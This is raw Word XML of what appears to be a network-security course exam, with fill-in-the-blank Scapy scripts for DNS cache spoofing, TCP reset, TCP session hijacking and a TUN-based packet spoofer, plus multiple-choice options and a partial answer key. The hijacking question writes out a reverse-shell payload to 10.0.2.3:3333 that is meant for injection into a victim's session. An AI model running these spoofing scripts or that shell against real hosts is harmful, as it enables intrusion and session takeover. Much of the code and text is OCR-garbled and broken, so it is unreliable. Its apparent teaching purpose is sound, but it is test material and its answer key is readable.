          <w:rFonts w:ascii="CIDFont+F3" w:hAnsi="CIDFont+F3" w:cs="CIDFont+F3"/>
          <w:color w:val="818181"/>
          <w:kern w:val="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818181"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC8AF6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6A8859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f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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CIDFont+F3" w:hAnsi="CIDFont+F3" w:cs="CIDFont+F3"/>
          <w:color w:val="6A8859"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>udp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CIDFont+F3" w:hAnsi="CIDFont+F3" w:cs="CIDFont+F3"/>
          <w:color w:val="6A8859"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CIDFont+F3" w:hAnsi="CIDFont+F3" w:cs="CIDFont+F3"/>
          <w:color w:val="6A8859"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CIDFont+F3" w:hAnsi="CIDFont+F3" w:cs="CIDFont+F3"/>
          <w:color w:val="6A8859"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> host 10.9.0.53 and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CIDFont+F3" w:hAnsi="CIDFont+F3" w:cs="CIDFont+F3"/>
          <w:color w:val="6A8859"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CIDFont+F3" w:hAnsi="CIDFont+F3" w:cs="CIDFont+F3"/>
          <w:color w:val="6A8859"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> port 53'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FE7F6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AAB8C7"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CIDFont+F3" w:hAnsi="CIDFont+F3" w:cs="CIDFont+F3"/>
          <w:color w:val="AAB8C7"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pkt 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 xml:space="preserve">= </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CIDFont+F3" w:hAnsi="CIDFont+F3" w:cs="CIDFont+F3"/>
          <w:color w:val="AAB8C7"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sniff(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CIDFont+F3" w:hAnsi="CIDFont+F3" w:cs="CIDFont+F3"/>
          <w:color w:val="AAB8C7"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>iface</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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6A8859"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'br-3d07a659426d'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, filter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r>
        <w:rPr>
          <w:rFonts w:ascii="CIDFont+F3" w:hAnsi="CIDFont+F3" w:cs="CIDFont+F3"/>
          <w:color w:val="AAB8C7"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>f, prn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CIDFont+F3" w:hAnsi="CIDFont+F3" w:cs="CIDFont+F3"/>
          <w:color w:val="CD7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CIDFont+F3" w:hAnsi="CIDFont+F3" w:cs="CIDFont+F3"/>
          <w:color w:val="AAB8C7"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>spoof_dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CIDFont+F3" w:hAnsi="CIDFont+F3" w:cs="CIDFont+F3"/>
          <w:color w:val="AAB8C7"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E69681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22. What are values in blanks 1 and 2, respectively?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCBB2A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pkt[IP].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</w:p>
    <w:p w14:paraId="1D92227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pkt[IP].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</w:p>
    <w:p w14:paraId="0A40E8A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‘www.example.net'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7729213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‘www.example.net’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEBDB5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23. What are values in blanks 3 and 4, respectively?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164AD12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UDP].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pkt[UDP].sport</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F46ADB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TCP].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pkt[TCP].sport</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6582480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TCP].sport, pkt[TCP].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</w:p>
    <w:p w14:paraId="5212F20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UDP]. sport,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UDP].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</w:p>
    <w:p w14:paraId="3BDB4E6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24. What are values in blanks 5, 6 and 7, respectively?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675AD1A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'NS', 'A', 'ns.attacker.com’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2229DB8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B. 'A', 'NS', 'ns.attacker.com’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD74DB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'AAAA', 'NS', 'ns.attacker.com’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CD3B7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D. 'A', 'NS', 'www.example.net’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C70650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25. What are values in blanks 8, 9 and 10, respectively?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE1B5E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pkt.id,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pkt.qd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, 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440C6DB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pkt.id,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pkt.qd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, 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDA80B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DNS].id, pkt[DNS].qd.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7888C7E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DNS].id, pkt[DNS].qd,1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326966B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Ashley is a student in CYBR 5300 class. She is working on the TCP lab to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conduct</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="10977D0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TCP reset attack Please help her to fill the seven blanks in the following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Python</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1EA49F5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script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C814A4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lastRenderedPageBreak/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scapy.all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import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770B942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def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spoof_tcp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(pkt):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123FA0D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IPLayer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=pkt[IP].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=pkt[IP].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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0B328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TCPLayer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flags="R", seq=pkt[TCP].ack,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9D27C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TCP].sport, sport=pkt[TCP].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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0BB78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spoofpkt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IPLayer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TCPLayer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="528BFBA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ls(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spoofpkt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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F42E2A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send(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spoofpkt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verbose=0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FE137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pkt=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sniff(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iface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='br-7ea0c5dbaac7', filter='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and port 23', prn=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spoof_tcp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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653D53D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#1/usr/bin/python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC5F48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scapy.all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import.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514303A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def spoof (pkt):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F046C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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D83F1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=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TCP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F87C4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1,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2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C417A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=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sport =3,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= 4, flag= 5, seq=6)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CCC23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pkt = 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1244136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pkt.show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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A7F75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send(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pkt, verbose-0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC941B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26. What are values in blanks 1 and 2, respectively?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EAD34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pre_ip.src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="50B86E2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pre_ip.dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4E660DA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pre_tcp.src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3C26B0C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pre_tcp.dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3359D9A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27. What are values in blanks 3 and 4, respectively?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1900B1F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ip.sport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pre_ip.dport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4AB73A3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ip.dport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pre_ip.sport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7240939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tcp.sport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pre_tcp.dport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="326AD24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tcp.dport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pre_tcp.sport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4711160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28. What are values in blanks 5, 6 and 7, respectively?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7587D60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'S',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pre_tcp.seq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</w:p>
    <w:p w14:paraId="772A943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'R',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pre_tcp.seq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</w:p>
    <w:p w14:paraId="3784314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'R',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pre_tcp.ack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</w:p>
    <w:p w14:paraId="65637F6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'S',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pre_tcp.ack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</w:p>
    <w:p w14:paraId="351A9F7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Kevin is a student in CYBR 5800 class. He is working on the TCP lab to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conduct</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5964F31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the TCP session hijacking attack. His goal is to get a reverse shell to his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computer</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="10CECF8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(10.0.2.3) at port 3333, Please help him to fill the eight blanks in the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following</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="68FBAEB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Python script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6B031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#1/usr/bin/python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16635EC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lastRenderedPageBreak/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scapy.all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import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import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sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D38D48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def spoof (pkt):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083F55F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old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-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pkt[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IP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D2448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old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</w:p>
    <w:p w14:paraId="1D9C517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pkt(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TCP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EE8C04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tcp_len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old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old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ip.iht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4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tcp.dataofs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4 TCP data length</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7E3A8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src_1, dst-_2_)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479715C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-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sport=3,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dport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4, flags= 5, seq_6, ack-_7_)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2C651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data 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642F6FC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pkt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/data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADF531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send(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pkt, verbose=8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3483B5F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29. What are values in blanks 1 and 2, respectively?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE8439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old_ip.dst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old_ip.src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="587675B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old_ip.dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="538EB03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old_tcp.src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="240C0E4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old_tcp.dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7D8D2FE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30. What are values in blanks 3 and 4, respectively?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C74B1C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ip.dport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old_ip.sport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="13D3E8F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ip.sport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old_ip.dport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="439E34B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tcp.dport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old_tcp.sport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2759EFA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tcp.sport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old_tcp.dport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="404CC8D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31. What are values in blanks 5 and 6, respectively</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC0D54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'S',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old_tcp.ack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+ 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC2554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‘A’,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old_tcp.ack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+ 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764ECB9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C.'S’,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old_tcp.seq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+ 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E4C28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'A',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old_tcp.seq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+ 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E08C10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32. What are values in blanks 7 and 8, respectively</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E2755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old_tcp.ack+tcp_len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"\n/bin/bash-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&gt;/dev/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/10.0.2.3/3333 0&lt;&amp;1 2&gt;&amp;1\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABCB39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old_tcp.ack+tcp_len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"/bin/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bash-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&gt;/dev/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/10.0.2.3/3333 0&lt;&amp;1 2&gt;&amp;1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2441B28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old_tcp.seq+tcp_len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"\n/bin/bash-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&gt;/dev/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/10.0.2.3/3333 0&lt;&amp;12&gt;&amp;1\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076A60E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old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tcp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seq+tcp_len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, "/bin/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bash-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&gt;/dev/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tep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/10.0.2.3/3333 0&lt;&amp;1 2&gt;&amp;1”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171517F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Vinod is writing a Python script to create a TUN interface IP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address</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1F44936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192.168.53.99 is signed so the newly created TUN interface. For each IP packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D8A7B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the TUN surface receives, it sends out a spoofed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reply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IP packet with a fake source</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A81A7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IP address of 1.2.3.4 Please complete the following code for this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task</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1A0CE78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#1/usr/bin/python Sport Tent Import struct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Sapors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as import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time</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7C1C0AA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scapy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all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inors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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD0865F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TUNSETIFF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBFDA3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SEE TAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3723DC9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lastRenderedPageBreak/>
        <w:t>60454</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D2F19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001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388BDC9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IF NO PI 0x1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689979E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Create the tun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serface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tunes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opent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10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ROM</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="62E7250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ifr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struct-pack 16, 'd, 22 170 PLY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itsane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bytes CAT INCELLOR, TOMETER,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5883822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STY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48244C5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Get the interface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hae</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="33914DFE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framestnane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bytes decades UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6869DF7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stripe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40ADC78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the trace</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CD030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format(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tha</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="04F8F93C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pelet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interface Name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formatte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assign IP address 192.168.53.79</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7E2B4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es.system</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="294FB47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nate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the TN interface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vo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and ring es system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formatmane</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="71C9FE8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vite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True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D35A88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Get packet from the tur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interface</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3E9015A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packet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os:read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>(4 2949)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389B2E7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True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3453393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IP/packet)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C5E71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Send out spoof packet using the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tus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interface</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7E3F327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newpat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="598032FB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news/10.paytod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2630BE1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33. What are values in blanks 1 and 4, respectively?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F982A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A. ‘/dev/net/tun’, tun</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D16E62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‘/dev/net/tun',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os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="12889F6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C. 'dev/net/tap', tun</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5799C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‘/dev/net/tap’,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os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="21B2D743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34. What are values in blanks 2 and 3, respectively?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F8DDC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addr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add 192.168.53.99 dev,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link set dev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up</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3A60531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addr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add 192.168.53.99 dev (),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link set dev () up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5F62C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addr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add 192.168.53.99/24 dev,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link set dev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up</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="125C6D11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addr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add 192.168.53.99/24 dev (),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link set dev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()up</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7ED0EEA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35. What are values in blanks 5 and 6, respectively?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30616A5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A.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ip.dst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ip.src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="24388ED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B.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ip.dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="28CD0A7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C. ‘1.2.3.4',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ip.src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</w:p>
    <w:p w14:paraId="5D17B685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D. ‘1.2.3.4’, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CIDFont+F1" w:hAnsi="CIDFont+F1" w:cs="CIDFont+F1"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>ip.dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="71C2021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36. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CIDFont+F1" w:hAnsi="CIDFont+F1" w:cs="CIDFont+F1"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>A ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CIDFont+F1" w:hAnsi="CIDFont+F1" w:cs="CIDFont+F1"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> D(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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CIDFont+F1" w:hAnsi="CIDFont+F1" w:cs="CIDFont+F1"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>) -d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD78DF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1" w:hAnsi="CIDFont+F1" w:cs="CIDFont+F1"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>37. A, C (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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CIDFont+F2" w:hAnsi="CIDFont+F2" w:cs="CIDFont+F2"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>) -c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6E139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2" w:hAnsi="CIDFont+F2" w:cs="CIDFont+F2"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>38 A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF1B5E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2" w:hAnsi="CIDFont+F2" w:cs="CIDFont+F2"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>39 C, D(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CIDFont+F2" w:hAnsi="CIDFont+F2" w:cs="CIDFont+F2"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>praty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CIDFont+F2" w:hAnsi="CIDFont+F2" w:cs="CIDFont+F2"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>)-d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DB840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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CIDFont+F2" w:hAnsi="CIDFont+F2" w:cs="CIDFont+F2"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>40. D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A64F429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</w:p>
    <w:p w14:paraId="7DF786C8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7"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BFAA83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Q-&gt;1: Which of the following is not a valid RR </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CIDFont+F1" w:hAnsi="CIDFont+F1" w:cs="CIDFont+F1"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7A13D556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Answer: DOCX record is not a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CIDFont+F1" w:hAnsi="CIDFont+F1" w:cs="CIDFont+F1"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 resource record.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EC4D82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>Q-&gt;2: Which record is used to store domain name to IP address mapping in an IPV4 network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35666B70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Answer: A record returns a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CIDFont+F1" w:hAnsi="CIDFont+F1" w:cs="CIDFont+F1"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>32 bit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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 IPV4 address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35348127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Q-&gt;3: The zone data file for a domain would be located at which DNS server </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CIDFont+F1" w:hAnsi="CIDFont+F1" w:cs="CIDFont+F1"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3A4B8A5D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>Answer: Zone data file for domain is located at Primary DNS Server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F07D96A" w14:textId="77777777" w:rsidR="00624194" w:rsidRDefault="00624194" w:rsidP="00624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kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr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Q-&gt;4: Which of the following is the most common troubleshooting utility used for </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CIDFont+F1" w:hAnsi="CIDFont+F1" w:cs="CIDFont+F1"/>
          <w:color w:val="222222"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1B0670E0" w14:textId="6B2CAA39" w:rsidR="00580C9C" w:rsidRDefault="00624194" w:rsidP="00624194"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Answer: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
